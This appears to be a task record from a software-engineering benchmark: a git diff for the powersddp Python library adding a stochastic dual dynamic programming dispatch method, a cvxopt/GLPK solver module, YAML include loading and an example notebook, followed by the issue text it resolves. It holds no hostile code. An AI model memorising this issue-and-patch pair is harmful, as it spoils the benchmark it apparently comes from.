+ {file = "pandas-1.3.2-cp38-cp38-win32.whl", hash = "sha256:69e1b2f5811f46827722fd641fdaeedb26002bd1e504eacc7a8ec36bdc25393e"},
+ {file = "pandas-1.3.2-cp38-cp38-win_amd64.whl", hash = "sha256:7996d311413379136baf0f3cf2a10e331697657c87ced3f17ac7c77f77fe34a3"},
+ {file = "pandas-1.3.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:1738154049062156429a5cf2fd79a69c9f3fa4f231346a7ec6fd156cd1a9a621"},
+ {file = "pandas-1.3.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9cce01f6d655b4add966fcd36c32c5d1fe84628e200626b3f5e2f40db2d16a0f"},
+ {file = "pandas-1.3.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1099e2a0cd3a01ec62cca183fc1555833a2d43764950ef8cb5948c8abfc51014"},
+ {file = "pandas-1.3.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0cd5776be891331a3e6b425b5abeab9596abea18435c5982191356f9b24ae731"},
+ {file = "pandas-1.3.2-cp39-cp39-win32.whl", hash = "sha256:66a95361b81b4ba04b699ecd2416b0591f40cd1e24c60a8bfe0d19009cfa575a"},
+ {file = "pandas-1.3.2-cp39-cp39-win_amd64.whl", hash = "sha256:89f40e5d21814192802421df809f948247d39ffe171e45fe2ab4abf7bd4279d8"},
+ {file = "pandas-1.3.2.tar.gz", hash = "sha256:cbcb84d63867af3411fa063af3de64902665bb5b3d40b25b2059e40603594e87"},
+]
pandocfilters = [
{file = "pandocfilters-1.4.3.tar.gz", hash = "sha256:bc63fbb50534b4b1f8ebe1860889289e8af94a23bff7445259592df25a3906eb"},
]
@@ -1554,6 +1652,10 @@ pickleshare = [
{file = "pickleshare-0.7.5-py2.py3-none-any.whl", hash = "sha256:9649af414d74d4df115d5d718f82acb59c9d418196b7b4290ed47a12ce62df56"},
{file = "pickleshare-0.7.5.tar.gz", hash = "sha256:87683d47965c1da65cdacaf31c8441d12b8044cdec9aca500cd78fc2c683afca"},
]
+plotly = [
+ {file = "plotly-5.2.1-py2.py3-none-any.whl", hash = "sha256:bf7c8123541a2c6579c309561a8e1058c129434c67419651efbdc4922b11da8f"},
+ {file = "plotly-5.2.1.tar.gz", hash = "sha256:1575c34f87313818fc109a3d3326f2b91363d049c1e80cbf68561c8df24fb47c"},
+]
pluggy = [
{file = "pluggy-0.13.1-py2.py3-none-any.whl", hash = "sha256:966c145cd83c96502c3c3868f50408687b38434af77734af1e9ca461a4081d2d"},
{file = "pluggy-0.13.1.tar.gz", hash = "sha256:15b2acde666561e1298d71b523007ed7364de07029219b604cf808bfa1c765b0"},
@@ -1769,6 +1871,10 @@ sniffio = [
{file = "sniffio-1.2.0-py3-none-any.whl", hash = "sha256:471b71698eac1c2112a40ce2752bb2f4a4814c22a54a3eed3676bc0f5ca9f663"},
{file = "sniffio-1.2.0.tar.gz", hash = "sha256:c4666eecec1d3f50960c6bdf61ab7bc350648da6c126e3cf6898d8cd4ddcd3de"},
]
+tenacity = [
+ {file = "tenacity-8.0.1-py3-none-any.whl", hash = "sha256:f78f4ea81b0fabc06728c11dc2a8c01277bfc5181b321a4770471902e3eb844a"},
+ {file = "tenacity-8.0.1.tar.gz", hash = "sha256:43242a20e3e73291a28bcbcacfd6e000b02d3857a9a9fff56b297a27afdc932f"},
+]
terminado = [
{file = "terminado-0.11.0-py3-none-any.whl", hash = "sha256:221eef83e6a504894842f7dccfa971ca2e98ec22a8a9118577e5257527674b42"},
{file = "terminado-0.11.0.tar.gz", hash = "sha256:1e01183885f64c1bba3cf89a5a995ad4acfed4e5f00aebcce1bf7f089b0825a1"},
diff --git a/powersddp/core/system.py b/powersddp/core/system.py
index d8e72df..69a4181 100644
--- a/powersddp/core/system.py
+++ b/powersddp/core/system.py
@@ -1,59 +1,208 @@
"""Module to handle classes and methods related to a selected Power System.
-This module should follow a systems.json file standar:
-{
- "{name}": {
- "shedding_cost": float,
- "load": [float, float, float],
- "n_disc": int,
- "n_est": int,
- "n_cen": int,
- "generation_units": [
- {"type": "hydro",
- "name": "str",
- "v_max": float,
- "v_min": float,
- "prod": float,
- "flow_max": float,
- "inflow_scenarios":[<list>]},
- {"type": "thermal", "name": "str", "capacity": "float", "cost": float},
- ...
- ]
- }
-}
-Where {name} should be changed to whatever name you may choose to your system.
-For example, 'Test01'. Check README.md file.
+This module should follow a systems.yml file standard:
+
+# system.yml
+load: [float,float,float]
+discretizations: int
+stages: int
+scenarios: int
+outage_cost: float
+hydro-units: !include system-hydro.yml
+thermal-units: !include system-thermal.yml
+
+# system-hydro.yml
+-
+ name: str
+ v_max: float
+ v_min: float
+ prod: float
+ flow_max: float
+ inflow_scenarios:
+ - list<float>
+ - list<float>
+ - list<float>
+
+# system-thermal.yml
+-
+ name: str
+ capacity: float
+ cost: float
"""
-from abc import ABC, abstractclassmethod
+from abc import ABC, abstractmethod
+from itertools import product
+import numpy as np
+import pandas as pd
import yaml
-from powersddp.util._yml import YmlLoader
-
-YmlLoader.add_constructor("!include", YmlLoader.include)
+from powersddp.utils._yml import YmlLoader
+from powersddp.utils._solver import sdp, plot_future_cost_function
class PowerSystemInterface(ABC):
- @abstractclassmethod
+ @abstractmethod
def load_system(self):
raise NotImplementedError
+ @abstractmethod
+ def dispatch(self):
+ raise NotImplementedError
+
class PowerSystem(PowerSystemInterface):
- def __init__(self, verbose: bool = False, **kwargs):
- self.__verbose = verbose
- self.__dict__.update(kwargs)
- self.load_system()
+ """Singleton Class to instantiate a Power System.
- def load_system(self):
- if "path" in self.__dict__:
- with open(self.path, "r") as f:
- data = yaml.load(f, YmlLoader)
-
- self.data = data
- if self.__verbose:
- print("System loaded from {} file".format(self.path))
- elif "data" in self.__dict__:
- if self.__verbose:
- print("System loaded from 'data' payload")
+    A Power System is defined based on a set of parameters, including the system
+    parameters and all the generation units, both thermal and hydro.
+
+ Note: Either initialize a Power System by providing the path to a systems.yml file or
+ by providing a dictionary containing all the necessary data.
+
+ Attributes
+ ----------
+ path : str, optional
+ Path to the systems.yml file
+ data : dict, optional
+ Dictionary containing all of the power system parameters, including the generation units.
+
+ """
+
+ def __init__(self, path: str = None, data: dict = None):
+ """__init__ method.
+
+ Parameters
+ ----------
+ path : str, optional
+ Path to the systems.yml file.
+        data : :obj:`dict`, optional
+            Dictionary containing all of the power system parameters, including
+            the generation units.
+
+ """
+
+ self.load_system(path=path, data=data)
+
+ def load_system(self, *, path: str = None, data: dict = None):
+ """Loads a Power System from file or dictionary payload
+
+        A Power System can be loaded from either a file or a dictionary payload. In
+        case both keyword parameters are supplied, the file path takes priority and
+        the data payload is ignored.
+
+ PowerSystem loads the data by default during initialization, but can be reloaded ad-hoc.
+
+ Parameters
+ ----------
+ path : str, optional
+ Path to the .yml file containing the system data.
+ data : dict, optional
+ Dictionary containing the structured data of the system.
+
+ """
+ if path:
+ with open(path, "r") as f:
+ self.data = yaml.load(f, YmlLoader)
+ elif data:
+ self.data = data
else:
- raise NotImplementedError
+ raise ValueError(
+ "load_system() should receive path=str or data=dict as arguments"
+ )
+
+ def dispatch(
+ self, *, solver: str = "sdp", plot: bool = False, verbose: bool = False
+ ) -> pd.DataFrame:
+ """Solves a financial dispatch of a Power System class
+
+ Once instantiated a Power System can deploy the generation units based on the
+ minimization of an objective function. This method iterates over every stage
+ and scenario of the Power System, finding the optimal solution of the problem
+ using the Dual Stochastic Dynamic Programming technique.
+
+ Parameters
+ ----------
+        solver : str, optional
+            Solution technique to apply; defaults to "sdp"
+            (Stochastic Dual Programming).
+        plot : bool, optional
+            Boolean to plot the future cost function of every stage.
+        verbose : bool, optional
+            Boolean to display the solution of every stage and scenario of
+            the execution.
+
+ Returns
+ -------
+ operation : pandas.DataFrame
+ A Dataframe containing the operation on every stage and scenario.
+
+ """
+
+ n_hgu = len(self.data["hydro-units"])
+
+ step = 100 / (self.data["discretizations"] - 1)
+ discretizations = list(product(np.arange(0, 100 + step, step), repeat=n_hgu))
+
+ operation = []
+ cuts = [] # type: ignore
+ for stage in range(self.data["stages"], 0, -1):
+ for discretization in discretizations:
+
+ v_i = []
+ # For Every Hydro Unit
+ for i, hgu in enumerate(self.data["hydro-units"]):
+ v_i.append(
+ hgu["v_min"]
+ + (hgu["v_max"] - hgu["v_min"]) * discretization[i] / 100
+ )
+
+ # For Every Scenario
+ average = 0.0
+ avg_water_marginal_cost = [0 for _ in self.data["hydro-units"]]
+ for scenario in range(self.data["scenarios"]):
+ inflow = []
+ for i, hgu in enumerate(self.data["hydro-units"]):
+ inflow.append(hgu["inflow_scenarios"][stage - 1][scenario])
+
+ if verbose:
+ print(
+ "STAGE: {} | DISC.: {}% | SCENARIO: {}".format(
+ stage, int(discretization[0]), scenario
+ )
+ )
+ result = sdp(
+ system_data=self.data,
+ v_i=v_i,
+ inflow=inflow,
+ cuts=cuts,
+ stage=stage + 1,
+ verbose=verbose,
+ )
+ average += result["total_cost"]
+ for i, hgu in enumerate(result["hydro_units"]):
+ avg_water_marginal_cost[i] += hgu["water_marginal_cost"]
+
+ # Calculating the average of the scenarios
+ average = average / self.data["scenarios"]
+ coef_b = average
+ for i, hgu in enumerate(result["hydro_units"]):
+                # ! Invert the coefficient because the minimization problem inverts the sign
+ avg_water_marginal_cost[i] = (
+ -avg_water_marginal_cost[i] / self.data["scenarios"]
+ )
+ coef_b -= v_i[i] * avg_water_marginal_cost[i]
+
+ cuts.append(
+ {"stage": stage, "coef_b": coef_b, "coefs": avg_water_marginal_cost}
+ )
+ operation.append(
+ {
+ "stage": stage,
+ "storage_percentage": "{}%".format(int(discretization[i])),
+ "initial_volume": v_i[0],
+ "average_cost": round(average, 2),
+ }
+ )
+ operation_df = pd.DataFrame(operation)
+
+ if n_hgu == 1 and plot:
+ plot_future_cost_function(operation=operation_df)
+
+ return operation_df
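The discretization grid at the top of `dispatch()` enumerates every combination of storage percentages across the hydro units. A pure-Python sketch equivalent to the `np.arange`/`itertools.product` construction (the function name here is ours, not part of the module):

```python
from itertools import product


def storage_grid(n_discretizations, n_hgu):
    """Every combination of storage percentages (0..100%) over n_hgu units."""
    step = 100 / (n_discretizations - 1)
    percentages = [i * step for i in range(n_discretizations)]
    return list(product(percentages, repeat=n_hgu))


grid = storage_grid(3, 1)   # [(0.0,), (50.0,), (100.0,)]
pairs = storage_grid(3, 2)  # 3**2 = 9 combinations for two hydro units
```

Each percentage tuple is then mapped to initial volumes via `v_min + (v_max - v_min) * p / 100`, as done in the loop above.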
diff --git a/powersddp/util/__init__.py b/powersddp/utils/__init__.py
similarity index 100%
rename from powersddp/util/__init__.py
rename to powersddp/utils/__init__.py
diff --git a/powersddp/utils/_solver.py b/powersddp/utils/_solver.py
new file mode 100644
index 0000000..a2d597f
--- /dev/null
+++ b/powersddp/utils/_solver.py
@@ -0,0 +1,215 @@
+"""Utilitarian module to solve power systems.
+"""
+
+
+import cvxopt.modeling as model
+import pandas as pd
+import plotly.graph_objects as go
+
+from cvxopt import solvers
+from plotly.subplots import make_subplots
+
+solvers.options["glpk"] = dict(msg_lev="GLP_MSG_OFF")
+
+
+# Unique Linear Programming
+def ulp(
+ system_data: dict,
+ v_i: list,
+ inflow: list,
+ cuts: list,
+ stage: int,
+ verbose: bool = False,
+):
+ """Unique Linear Programming Solver
+
+ Parameters
+ ----------
+    system_data : dict
+        Dict containing data structured as used to instantiate a PowerSystem.
+    v_i : list
+        List containing the initial volume of each Hydro Unit.
+    inflow : list
+        List containing the inflow to each Hydro Unit.
+    cuts : list
+        List of cuts of the future cost function of the stage ahead.
+    stage : int
+        Stage of the execution.
+    verbose : bool, optional
+        Boolean to display the solution of the optimization problem.
+ """
+
+ return None
+
+
+# Stochastic Dual Programming
+def sdp(
+ system_data: dict,
+ v_i: list,
+ inflow: list,
+ cuts: list,
+ stage: int,
+ verbose: bool = False,
+):
+ """Stochastic Dual Programming Solver
+
+ Method to abstract the Dual Stochastic Programming solver applied to the power system
+ problem.
+
+ Parameters
+ ----------
+    system_data : dict
+        Dict containing data structured as used to instantiate a PowerSystem.
+    v_i : list
+        List containing the initial volume of each Hydro Unit.
+    inflow : list
+        List containing the inflow to each Hydro Unit.
+    cuts : list
+        List of cuts of the future cost function of the stage ahead.
+    stage : int
+        Stage of the execution.
+    verbose : bool, optional
+        Boolean to display the solution of the optimization problem.
+
+ Returns
+ -------
+ operation : dict
+ A dictionary representing the operation
+ """
+
+ n_tgu = len(system_data["thermal-units"])
+ n_hgu = len(system_data["hydro-units"])
+
+ ## Initializing Model Variables
+ v_f = model.variable(n_hgu, "Final Volume")
+ v_t = model.variable(n_hgu, "Turbined Flow")
+ v_v = model.variable(n_hgu, "Shed Flow")
+ g_t = model.variable(n_tgu, "Power Generated")
+ shortage = model.variable(1, "Power Shortage")
+ alpha = model.variable(1, "Future Cost")
+
+ ## Objective Function
+ objective_function = 0
+ for i, tgu in enumerate(system_data["thermal-units"]):
+ objective_function += tgu["cost"] * g_t[i]
+ objective_function += system_data["outage_cost"] * shortage[0]
+ for i, _ in enumerate(system_data["hydro-units"]):
+ objective_function += 0.01 * v_v[i]
+ objective_function += 1.0 * alpha[0]
+
+ ## Constraints
+ ### Hydro Balance
+ constraints = []
+ for i, hgu in enumerate(system_data["hydro-units"]):
+ constraints.append(v_f[i] == float(v_i[i]) + float(inflow[i]) - v_t[i] - v_v[i])
+
+ ### Load Supply
+ supplying = 0
+ for i, hgu in enumerate(system_data["hydro-units"]):
+ supplying += hgu["prod"] * v_t[i]
+
+ for i, tgu in enumerate(system_data["thermal-units"]):
+ supplying += g_t[i]
+
+ supplying += shortage[0]
+
+ constraints.append(supplying == system_data["load"][stage - 2])
+
+ ### Bounds
+ for i, hgu in enumerate(system_data["hydro-units"]):
+ constraints.append(v_f[i] >= hgu["v_min"])
+ constraints.append(v_f[i] <= hgu["v_max"])
+ constraints.append(v_t[i] >= 0)
+ constraints.append(v_t[i] <= hgu["flow_max"])
+ constraints.append(v_v[i] >= 0)
+
+ for i, tgu in enumerate(system_data["thermal-units"]):
+ constraints.append(g_t[i] >= 0)
+ constraints.append(g_t[i] <= tgu["capacity"])
+
+ constraints.append(shortage[0] >= 0)
+ constraints.append(alpha[0] >= 0)
+
+ ### Cut constraint (Future cost function of forward stage)
+ for cut in cuts:
+ if cut["stage"] == stage:
+ equation = 0
+ for hgu in range(n_hgu):
+ equation += float(cut["coefs"][hgu]) * v_f[hgu]
+ equation += float(cut["coef_b"]) # type: ignore
+ constraints.append(alpha[0] >= equation)
+
+ ## Solving
+ opt_problem = model.op(objective=objective_function, constraints=constraints)
+ opt_problem.solve(format="dense", solver="glpk")
+
+ ## Print
+ if verbose:
+ print("--------------------------------------")
+ print("Total Cost: ${}".format(round(objective_function.value()[0], 2))) # type: ignore
+ print("Future Cost: ${}".format(round(alpha[0].value()[0], 2)))
+ print("--------------------------------------")
+ for i, hgu in enumerate(system_data["hydro-units"]):
+ print(
+ "HGU {} | {:>15s}: {:>7.2f} hm3".format(i, v_f.name, v_f[i].value()[0])
+ )
+ print(
+ "HGU {} | {:>15s}: {:>7.2f} hm3".format(i, v_t.name, v_t[i].value()[0])
+ )
+ print(
+ "HGU {} | {:>15s}: {:>7.2f} hm3".format(i, v_v.name, v_v[i].value()[0])
+ )
+ print(
+ "HGU {} | {:>15s}: {:>7.2f} $/hm3".format(
+ i, "Water Cost", constraints[i].multiplier.value[0]
+ )
+ )
+ print("--------------------------------------")
+
+ for i, tgu in enumerate(system_data["thermal-units"]):
+ print("TGU {} | {}: {:>7.2f} MWmed".format(i, g_t.name, g_t[i].value()[0]))
+ print("--------------------------------------")
+
+ print(
+ """{}: {:.2f} MWmed\nMarginal Cost: {:.2f}\n======================================\n
+ """.format(
+ shortage.name,
+ shortage[0].value()[0],
+ constraints[n_hgu].multiplier.value[0],
+ )
+ )
+
+ return {
+ "shortage": shortage[0].value()[0],
+ "operational_marginal_cost": constraints[n_hgu].multiplier.value[0],
+ "total_cost": objective_function.value()[0], # type: ignore
+ "future_cost": alpha[0].value()[0],
+ "hydro_units": [
+ {
+ "v_f": v_f[i].value()[0],
+ "v_t": v_t[i].value()[0],
+ "v_v": v_v[i].value()[0],
+ "water_marginal_cost": constraints[i].multiplier.value[0],
+ }
+ for i in range(n_hgu)
+ ],
+ "thermal_units": [{"g_t": g_t[i].value()[0]} for i in range(n_tgu)],
+ }
+
+
+def plot_future_cost_function(operation: pd.DataFrame):
+
+ n_stages = len(operation["stage"].unique())
+
+ fig = make_subplots(rows=n_stages, cols=1)
+
+ for i, stage in enumerate(operation["stage"].unique()):
+ stage_df = operation.loc[operation["stage"] == stage]
+ fig.add_trace(
+ go.Scatter(
+ x=stage_df["initial_volume"],
+ y=stage_df["average_cost"],
+ mode="lines",
+ name="Stage {}".format(stage),
+ ),
+ row=i + 1,
+ col=1,
+ )
+
+ fig.update_xaxes(title_text="Final Volume [hm3]")
+ fig.update_yaxes(title_text="$/MW")
+
+ fig.update_layout(height=300 * n_stages, title_text="Future Cost Function")
+ fig.show()
diff --git a/powersddp/util/_yml.py b/powersddp/utils/_yml.py
similarity index 62%
rename from powersddp/util/_yml.py
rename to powersddp/utils/_yml.py
index b0b21b8..72f1c7a 100644
--- a/powersddp/util/_yml.py
+++ b/powersddp/utils/_yml.py
@@ -1,8 +1,17 @@
+"""Utility module for handling .yml files
+"""
+
import yaml
import os
class YmlLoader(yaml.SafeLoader):
+    """Class extending the yaml loader with an ``!include`` constructor.
+
+    Attributes
+    ----------
+    _root : str
+        Directory of the including file, used to resolve relative paths.
+    """
+
def __init__(self, stream):
self._root = os.path.split(stream.name)[0]
@@ -11,7 +20,10 @@ def __init__(self, stream):
def include(self, node):
- filename = os.path.join(self._root, self.construct_scalar(node))
+ filename = os.path.join(self._root, self.construct_scalar(node)) # type: ignore
with open(filename, "r") as f:
return yaml.load(f, YmlLoader)
+
+
+YmlLoader.add_constructor("!include", YmlLoader.include)
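The `!include` constructor registered above can be exercised with a standalone sketch (not part of the patch; the file names and contents below are illustrative):

```python
import os
import tempfile

import yaml


# Same loader as in powersddp/utils/_yml.py: a SafeLoader that resolves
# `!include` paths relative to the file being loaded.
class YmlLoader(yaml.SafeLoader):
    def __init__(self, stream):
        self._root = os.path.split(stream.name)[0]
        super().__init__(stream)

    def include(self, node):
        filename = os.path.join(self._root, self.construct_scalar(node))
        with open(filename, "r") as f:
            return yaml.load(f, YmlLoader)


YmlLoader.add_constructor("!include", YmlLoader.include)

# A parent file pulls in a fragment via `!include`.
with tempfile.TemporaryDirectory() as tmp:
    with open(os.path.join(tmp, "units.yml"), "w") as f:
        f.write("- name: HU1\n")
    with open(os.path.join(tmp, "system.yml"), "w") as f:
        f.write("hydro-units: !include units.yml\n")
    with open(os.path.join(tmp, "system.yml")) as f:
        data = yaml.load(f, YmlLoader)

# data == {'hydro-units': [{'name': 'HU1'}]}
```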
diff --git a/pyproject.toml b/pyproject.toml
index 31928aa..df3a553 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -12,6 +12,9 @@ exclude = ["Makefile","README.rst","Notebook.ipynb"]
python = "^3.8"
PyYAML = "^5.4.1"
cvxopt = "^1.2.6"
+numpy = "^1.21.1"
+pandas = "^1.3.2"
+plotly = "^5.2.1"
[tool.poetry.dev-dependencies]
pytest = "^5.2"
Implement a Dispatch method for the PowerSystem object
## Description
Once initialized, a Power System can be optimally dispatched by minimizing an Objective Function.
## To Do
- Create a `PowerSystem.dispatch()` method to solve the Power System from the initial parameters `v_i` and `inflow`
- The output should be a dictionary, and a boolean `verbose` parameter should allow the execution to print the steps and outputs.
| 2021-08-22T22:45:27 | 0.0 | [] | [] |
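The objective assembled by `dispatch()` in the patch above can be illustrated solver-free: the sketch below builds the same cost coefficients per decision variable in plain Python (the `system_data` values are hypothetical, mirroring the layout used in the patch and README):

```python
# Hypothetical system data, matching the layout used by dispatch().
system_data = {
    "load": [50, 50, 50],
    "outage_cost": 500,
    "hydro-units": [
        {"name": "HU1", "v_max": 100, "v_min": 20, "prod": 0.95, "flow_max": 60}
    ],
    "thermal-units": [
        {"name": "GT1", "capacity": 15, "cost": 10},
        {"name": "GT2", "capacity": 10, "cost": 25},
    ],
}


def objective_coefficients(system_data, spill_penalty=0.01):
    """Cost coefficient per decision variable: thermal generation costs,
    the outage (shortage) cost, and a small penalty on shed volume."""
    coefs = {}
    for i, tgu in enumerate(system_data["thermal-units"]):
        coefs[f"g_t[{i}]"] = tgu["cost"]
    coefs["shortage"] = system_data["outage_cost"]
    for i, _ in enumerate(system_data["hydro-units"]):
        coefs[f"v_v[{i}]"] = spill_penalty
    return coefs


coefs = objective_coefficients(system_data)
# {'g_t[0]': 10, 'g_t[1]': 25, 'shortage': 500, 'v_v[0]': 0.01}
```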
|||
ettoreaquino/powersddp | ettoreaquino__powersddp-3 | 829615fd5e85be00f0e81c2eec464134c2623a8f | diff --git a/Notebook.ipynb b/Notebook.ipynb
new file mode 100644
index 0000000..18782e2
--- /dev/null
+++ b/Notebook.ipynb
@@ -0,0 +1,310 @@
+{
+ "cells": [
+ {
+ "cell_type": "code",
+ "execution_count": 1,
+ "id": "9dd8e6a5-b075-404b-85eb-6131fcca2a2a",
+ "metadata": {},
+ "outputs": [
+ {
+ "name": "stdout",
+ "output_type": "stream",
+ "text": [
+ "System loaded from system.yml file\n"
+ ]
+ }
+ ],
+ "source": [
+ "from powersddp.system import PowerSystem\n",
+ "import cvxopt.modeling as model\n",
+ "\n",
+ "data = {'load': [50, 50, 50],\n",
+ " 'discretizations': 3,\n",
+ " 'stages': 3,\n",
+ " 'scenarios': 2,\n",
+ " 'shedding_cost': 500,\n",
+ " 'hydro-units': [{'name': 'HU1',\n",
+ " 'v_max': 100,\n",
+ " 'v_min': 20,\n",
+ " 'prod': 0.95,\n",
+ " 'flow_max': 60,\n",
+ " 'inflow_scenarios': [[23, 16], [19, 14], [15, 11]]}],\n",
+ " 'thermal-units': [{'name': 'GT1', 'capacity': 15, 'cost': 10},\n",
+ " {'name': 'GT2', 'capacity': 10, 'cost': 25}]}\n",
+ "\n",
+ "TestSystem = PowerSystem(path='system.yml')"
+ ]
+ },
+ {
+ "cell_type": "markdown",
+ "id": "af0e4777-071d-45f7-b711-f7314f64c94b",
+ "metadata": {},
+ "source": [
+ "## Decision Variables\n",
+ "\n",
+ "### Hydro Units\n",
+ "- Final volume $v_f$: The final volume of the reservoir after the operational period\n",
+ "- Turbined flow $v_t$: The ammount of water that was turbined during the period\n",
+ "- Shed volume $v_v$: The ammount of water that was shed in the period\n",
+ "- Initial volume $v_i$\n",
+ "- Influx $afl$\n",
+ "\n",
+ "### Thermal Units\n",
+ "- total generation $g_t$: The total amount of generation provided by the unit during the period\n",
+ "\n",
+ "### System\n",
+    "- Outage $def$: The total amount of power that will not be delivered by the system\n",
+ "\n",
+ "\n",
+ "\n",
+ "## The Objective Function\n",
+ "\n",
+ "Assuming a problem with 3 generation units (2 TGUs and 1 HGU) let's write down the Objetive Function of our problem:\n",
+ "\n",
+ "$$\n",
+ "\\begin{equation}\n",
+ " \\begin{aligned}\n",
+ " \\min \\quad & C_1\\cdot g_{t_1} + C_2\\cdot g_{t_2} + C_{def}\\cdot def + 0.01\\cdot v_v\\\\\n",
+ " \\textrm{s.t.} \\quad & \\\\\n",
+    "    \\textrm{hydro balance} \\quad & v_f = v_i + afl - v_t - v_v \\\\\n",
+ " \\textrm{load supplying} \\quad & \\rho\\cdot v_t + g_{t_1} + g_{t_2} + def = \\textrm{load}\\\\\n",
+ " \\textrm{constraints} \\quad & \\\\\n",
+ " & v_{f_{min}}\\leq v_f \\leq v_{f_{max}}\\\\\n",
+ " & v_{t_{min}}\\leq v_t \\leq v_{t_{max}}\\\\\n",
+ " & v_{v_{min}}\\leq v_v \\leq v_{v_{max}}\\\\\n",
+ " & g_{t_{min}}\\leq g_t^\\ast \\leq g_{t_{max}}\\\\\n",
+ " ^\\ast \\textrm{for each TGU}& \n",
+ " \\end{aligned}\n",
+ "\\end{equation}\n",
+ "$$\n",
+ "\n",
+ "> Later we shall also add the Future Cost Function $\\alpha$ in the minimization function "
+ ]
+ },
+ {
+ "cell_type": "code",
+ "execution_count": 4,
+ "id": "ccbf3a14-01ed-4942-acb3-a4c64f47b6fd",
+ "metadata": {},
+ "outputs": [],
+ "source": [
+ "def dispatch(system, v_i, inflow):\n",
+ " n_tgu = len(system.data['thermal-units'])\n",
+ " n_hgu = len(system.data['hydro-units'])\n",
+ "\n",
+ "\n",
+ " ## Initializing Model Variables\n",
+ " v_f = model.variable(n_hgu, \"Final Volume of the Hydro Unit\")\n",
+ " v_t = model.variable(n_hgu, \"Turbined Flow of the Hydro Unit\")\n",
+ " v_v = model.variable(n_hgu, \"Shed flow of the Hydro Unit\")\n",
+ " g_t = model.variable(n_tgu, \"Power generated by the Thermal Unit\")\n",
+ " deficit = model.variable(1, \"Power deficit\")\n",
+ "\n",
+ " ## Objective Function\n",
+ " fob = 0\n",
+ " for i, tgu in enumerate(system.data['thermal-units']):\n",
+ " fob += tgu[\"cost\"]*g_t[i]\n",
+    "    fob += system.data['outage_cost']*deficit[0]\n",
+ " for i, _ in enumerate(system.data['hydro-units']):\n",
+ " fob += 0.01*v_v[i]\n",
+ "\n",
+ " ## Hydro Balance\n",
+ " constraints = []\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+ " constraints.append( v_f[i] == v_i + inflow - v_t[i] - v_v[i] )\n",
+ "\n",
+ " supplying = 0\n",
+ " ## Load Supplying\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+ " supplying += hgu[\"prod\"] * v_t[i]\n",
+ "\n",
+ " for i, tgu in enumerate(system.data['thermal-units']):\n",
+ " supplying += g_t[i]\n",
+ "\n",
+ " supplying += deficit[0]\n",
+ "\n",
+ " constraints.append(supplying == system.data['load'][2])\n",
+ "\n",
+ " ## Constraints\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+ " constraints.append(v_f[i] >= hgu[\"v_min\"])\n",
+ " constraints.append(v_f[i] <= hgu[\"v_max\"])\n",
+ " constraints.append(v_t[i] >= 0)\n",
+ " constraints.append(v_t[i] <= hgu[\"flow_max\"])\n",
+ " constraints.append(v_v[i] >= 0)\n",
+ "\n",
+ " for i, tgu in enumerate(system.data['thermal-units']):\n",
+ " constraints.append(g_t[i] >= 0)\n",
+ " constraints.append(g_t[i] <= tgu[\"capacity\"])\n",
+ "\n",
+ " constraints.append(deficit[0] >= 0)\n",
+ " \n",
+ " opt_problem = model.op(objective=fob, constraints=constraints)\n",
+ " opt_problem.solve(format='dense',solver='glpk')\n",
+ "\n",
+ " print(\"Total Cost: {}\".format(fob.value()))\n",
+ "\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+ " print(\"{} {} is {} hm3\".format(v_f.name,i,v_f[i].value()))\n",
+ " print(\"{} {} is {} hm3\".format(v_t.name,i,v_t[i].value()))\n",
+ " print(\"{} {} is {} hm3\".format(v_v.name,i,v_v[i].value()))\n",
+ "\n",
+ " for i, tgu in enumerate(system.data['thermal-units']):\n",
+ " print(\"{} {} is {} MWmed\".format(g_t.name,i,g_t[i].value()))\n",
+ "\n",
+ " print(\"{} is {} MWmed\".format(deficit.name,deficit[0].value()))\n",
+ "\n",
+ " for i, hgu in enumerate(system.data['hydro-units']):\n",
+ " print(\"The cost of water at Hydro Unit {} is {} hm3\".format(i,constraints[i].multiplier.value))\n",
+ "\n",
+ " print(\"The Marginal Cost is: {}\".format(constraints[n_hgu].multiplier.value))"
+ ]
+ },
+ {
+ "cell_type": "code",
+ "execution_count": 5,
+ "id": "17fb0a0c-5a87-41fb-a645-1434a65c02d4",
+ "metadata": {},
+ "outputs": [
+ {
+ "name": "stdout",
+ "output_type": "stream",
+ "text": [
+ "Total Cost: [ 7.67e+03]\n",
+ "\n",
+ "Final Volume of the Hydro Unit 0 is [ 2.00e+01]\n",
+ " hm3\n",
+ "Turbined Flow of the Hydro Unit 0 is [ 1.10e+01]\n",
+ " hm3\n",
+ "Shed flow of the Hydro Unit 0 is [ 0.00e+00]\n",
+ " hm3\n",
+ "Power generated by the Thermal Unit 0 is [ 1.50e+01]\n",
+ " MWmed\n",
+ "Power generated by the Thermal Unit 1 is [ 1.00e+01]\n",
+ " MWmed\n",
+ "Power deficit is [ 1.45e+01]\n",
+ " MWmed\n",
+ "The cost of water at Hydro Unit 0 is [ 4.75e+02]\n",
+ " hm3\n",
+ "The Marginal Cost is: [-5.00e+02]\n",
+ "\n",
+ "GLPK Simplex Optimizer, v4.65\n",
+ "12 rows, 6 columns, 17 non-zeros\n",
+ " 0: obj = 0.000000000e+00 inf = 1.010e+02 (3)\n",
+ " 5: obj = 7.675000000e+03 inf = 0.000e+00 (0)\n",
+ "* 6: obj = 7.675000000e+03 inf = 0.000e+00 (0)\n",
+ "OPTIMAL LP SOLUTION FOUND\n"
+ ]
+ }
+ ],
+ "source": [
+ "system = TestSystem\n",
+ "v_i = 20\n",
+ "inflow = 11\n",
+ "\n",
+ "dispatch(system=system, v_i=v_i, inflow=inflow)"
+ ]
+ },
+ {
+ "cell_type": "code",
+ "execution_count": 9,
+ "id": "108fdcb5-9ce2-49db-b487-eeaf90ec0e24",
+ "metadata": {},
+ "outputs": [
+ {
+ "name": "stdout",
+ "output_type": "stream",
+ "text": [
+ "System Load: [50, 50, 50]\n",
+ "Number of HGUs: 1\n",
+ "Number of TGUs: 2\n"
+ ]
+ }
+ ],
+ "source": [
+ "import powersddp\n",
+ "\n",
+ "system = powersddp.PowerSystem(path='system.yml')\n",
+ "\n",
